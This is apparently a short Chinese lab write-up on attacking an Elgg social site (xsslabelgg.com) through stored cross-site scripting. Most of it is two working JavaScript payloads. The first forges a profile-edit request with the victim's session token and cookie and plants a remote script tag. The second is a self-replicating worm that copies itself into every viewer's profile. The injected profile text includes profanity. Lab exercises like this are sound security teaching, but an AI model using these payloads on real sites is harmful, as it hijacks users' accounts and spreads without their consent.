首先尋找攻擊入口:
然後在裡面寫入js代碼,如果js代碼太長不能滿足格式長度要求的話那就直接導入js檔案
攻擊代碼如下:
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The<span style="font-family: Arial, Helvetica, sans-serif;"> format of the content can be learned</span>
// from LiveHTTPHeaders.
var briefdescription="<script src='http://www.xsslabelgg.com/file/download/57' type='text/javascript'></script>";
var content="name="+elgg.session.user.username+"&description=fuckfuckfuckfuckfuckfuck&guid="+elgg.session.user.guid+"&__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&briefdescription="+briefdescription+"&accesslevel[description]=2&accesslevel[briefdescription]=2";
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
當不使用js導入時,攻擊代碼如下:
<script id="worm" type="text/javascript">
var strCode = document.getElementById("worm").innerHTML;
var sub_script_begin="worm<script id=worm>";
var sub_script_end="<\/script>";
var sub_script=sub_script_begin.concat(strCode,sub_script_end);
sub_script = escape(sub_script);
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content="name=".concat(elgg.session.user.username).concat("&description=").concat(sub_script).concat("&guid=").concat(elgg.session.user.guid).concat("&__elgg_token=").concat(elgg.security.token.__elgg_token).concat("&__elgg_ts=").concat(elgg.security.token.__elgg_ts).concat("&accesslevel[description]=2");
// You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
alert(content);
</script>
這是采用worm方式進行的攻擊,當受害者浏覽時可被感染。
![vulnhub DC-4靶機實戰0X01 環境部署[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)